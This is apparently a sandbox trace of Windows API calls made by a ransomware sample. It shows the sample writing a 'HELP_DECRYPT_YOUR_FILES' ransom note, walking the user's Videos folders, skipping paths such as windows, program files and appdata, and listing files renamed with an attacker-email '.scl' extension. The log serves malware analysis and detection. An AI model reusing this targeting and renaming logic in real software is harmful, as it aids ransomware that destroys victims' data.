	[0200.637] wsprintfA (in: param_1=0x188b18, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0200.637] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0200.638] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0200.638] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0200.638] WriteFile (in: hFile=0x390, lpBuffer=0x188b18*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x188c30, lpOverlapped=0x0 | out: lpBuffer=0x188b18*, lpNumberOfBytesWritten=0x188c30*=0x43, lpOverlapped=0x0) returned 1
	[0200.638] CloseHandle (hObject=0x390) returned 1
	[0200.639] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f8ce420, ftCreationTime.dwHighDateTime=0x1d968a6, ftLastAccessTime.dwLowDateTime=0x910fb0e6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x911e0297, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName=".", cAlternateFileName="")) returned 0xfb90b0
	[0200.639] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*") returned 102
	[0200.639] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.639] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\JnTt-vV vFZHDMuv\\*.*", cchLength=0x66 | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*") returned 0x66
	[0200.639] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.639] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="windows") returned 0x0
	[0200.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.640] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="boot") returned 0x0
	[0200.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.640] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="system volume information") returned 0x0
	[0200.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.640] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0200.640] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.641] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="temp") returned 0x0
	[0200.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.641] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="program files") returned 0x0
	[0200.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.641] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="program files (x86)") returned 0x0
	[0200.641] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.642] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="appdata") returned 0x0
	[0200.642] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.642] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="application data") returned 0x0
	[0200.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.643] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="winnt") returned 0x0
	[0200.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.643] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="tmp") returned 0x0
	[0200.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.643] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="cache") returned 0x0
	[0200.643] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.644] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="temporary internet files") returned 0x0
	[0200.644] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.644] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="webcache") returned 0x0
	[0200.644] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.644] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="inetcache") returned 0x0
	[0200.644] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.645] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="nvidia") returned 0x0
	[0200.645] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.645] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="packages") returned 0x0
	[0200.645] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.645] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="cookies") returned 0x0
	[0200.645] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.646] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\jntt-vv vfzhdmuv\\*.*", lpSrch="programdata") returned 0x0
	[0200.646] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0200.646] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0200.646] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f8ce420, ftCreationTime.dwHighDateTime=0x1d968a6, ftLastAccessTime.dwLowDateTime=0x910fb0e6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x911e0297, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="..", cAlternateFileName="")) returned 1
	[0200.646] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0200.646] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f0b3c7, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x90f0b3c7, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x90f3139b, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x133f0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="651ijdw0jxrz3jh.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="651IJD~1.SCL")) returned 1
	[0200.646] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911e0297, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x911e0297, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x911e0297, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0200.647] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911b9cef, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x911b9cef, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x911e0297, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0200.647] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9108c029, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x9108c029, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x910aec5a, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x11190, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="he_m_wdbcnl.flv.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="HE_M_W~1.SCL")) returned 1
	[0200.647] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910fb0e6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x910fb0e6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x910fb0e6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xaad0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="s5tikbrdppn.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="S5TIKB~1.SCL")) returned 1
	[0200.647] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910fb0e6, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x910fb0e6, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x910fb0e6, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xaad0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="s5tikbrdppn.swf.id_c287f3826d6e218_email_enc2@dr.com_.scl", cAlternateFileName="S5TIKB~1.SCL")) returned 0
	[0200.647] FindClose (in: hFindFile=0xfb90b0 | out: hFindFile=0xfb90b0) returned 1
	[0200.647] FindClose (in: hFindFile=0xfb90b0 | out: hFindFile=0xfb90b0) returned 0
	[0200.648] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbca4920, ftCreationTime.dwHighDateTime=0x1d973ea, ftLastAccessTime.dwLowDateTime=0x6fba25d0, ftLastAccessTime.dwHighDateTime=0x1d9764d, ftLastWriteTime.dwLowDateTime=0x6fba25d0, ftLastWriteTime.dwHighDateTime=0x1d9764d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="KcTv Nkg6", cAlternateFileName="KCTVNK~1")) returned 1
	[0200.648] lstrcmpW (lpString1="KcTv Nkg6", lpString2="..") returned 1
	[0200.648] lstrcmpW (lpString1="KcTv Nkg6", lpString2=".") returned 1
	[0200.648] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE"
	[0200.648] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\"
	[0200.648] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\", lpString2="KcTv Nkg6" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6"
	[0200.648] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6"
	[0200.649] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\"
	[0200.649] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\"
	[0200.649] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\", lpString2="*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*"
	[0200.649] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbca4920, ftCreationTime.dwHighDateTime=0x1d973ea, ftLastAccessTime.dwLowDateTime=0x6fba25d0, ftLastAccessTime.dwHighDateTime=0x1d9764d, ftLastWriteTime.dwLowDateTime=0x6fba25d0, ftLastWriteTime.dwHighDateTime=0x1d9764d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName=".", cAlternateFileName="")) returned 0xfb94b0
	[0200.649] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*") returned 95
	[0200.649] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0200.650] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\*.*", cchLength=0x5f | out: lpsz="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*") returned 0x5f
	[0200.650] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.650] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="windows") returned 0x0
	[0200.650] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.650] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="boot") returned 0x0
	[0200.650] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.651] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="system volume information") returned 0x0
	[0200.651] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.651] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0200.651] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.651] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="temp") returned 0x0
	[0200.651] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.652] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="program files") returned 0x0
	[0200.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.652] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="program files (x86)") returned 0x0
	[0200.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.652] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="appdata") returned 0x0
	[0200.652] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.653] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="application data") returned 0x0
	[0200.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.653] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="winnt") returned 0x0
	[0200.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.653] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="tmp") returned 0x0
	[0200.653] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.654] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="cache") returned 0x0
	[0200.654] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.654] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="temporary internet files") returned 0x0
	[0200.654] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.654] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="webcache") returned 0x0
	[0200.654] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.654] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="inetcache") returned 0x0
	[0200.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.655] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="nvidia") returned 0x0
	[0200.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.655] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="packages") returned 0x0
	[0200.655] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.655] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="cookies") returned 0x0
	[0200.656] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0200.656] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\videos\\9irupr75kfhemeucfkfj\\6umj9sfomg6z58wfzt\\3zsyulzns be\\kctv nkg6\\*.*", lpSrch="programdata") returned 0x0
	[0200.656] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbca4920, ftCreationTime.dwHighDateTime=0x1d973ea, ftLastAccessTime.dwLowDateTime=0x6fba25d0, ftLastAccessTime.dwHighDateTime=0x1d9764d, ftLastWriteTime.dwLowDateTime=0x6fba25d0, ftLastWriteTime.dwHighDateTime=0x1d9764d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="..", cAlternateFileName="")) returned 1
	[0200.656] FindNextFileW (in: hFindFile=0xfb94b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd39c1d00, ftCreationTime.dwHighDateTime=0x1d96f0a, ftLastAccessTime.dwLowDateTime=0xb1964bc0, ftLastAccessTime.dwHighDateTime=0x1d9746b, ftLastWriteTime.dwLowDateTime=0xb1964bc0, ftLastWriteTime.dwHighDateTime=0x1d9746b, nFileSizeHigh=0x0, nFileSizeLow=0x18239, dwReserved0=0x53006e, dwReserved1=0x420020, cFileName="CR_kBnC3kB_VYLQ.swf", cAlternateFileName="CR_KBN~1.SWF")) returned 1
	[0200.656] lstrcmpW (lpString1="CR_kBnC3kB_VYLQ.swf", lpString2="..") returned 1
	[0200.656] lstrcmpW (lpString1="CR_kBnC3kB_VYLQ.swf", lpString2=".") returned 1
	[0200.656] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\") returned="C:\\Users\\RDhJ0CNFevzX\\Videos\\9irupr75kfHemEUcFkFJ\\6uMJ9SfOMg6Z58WFzT\\3zsYUlznS BE\\KcTv Nkg6\\"
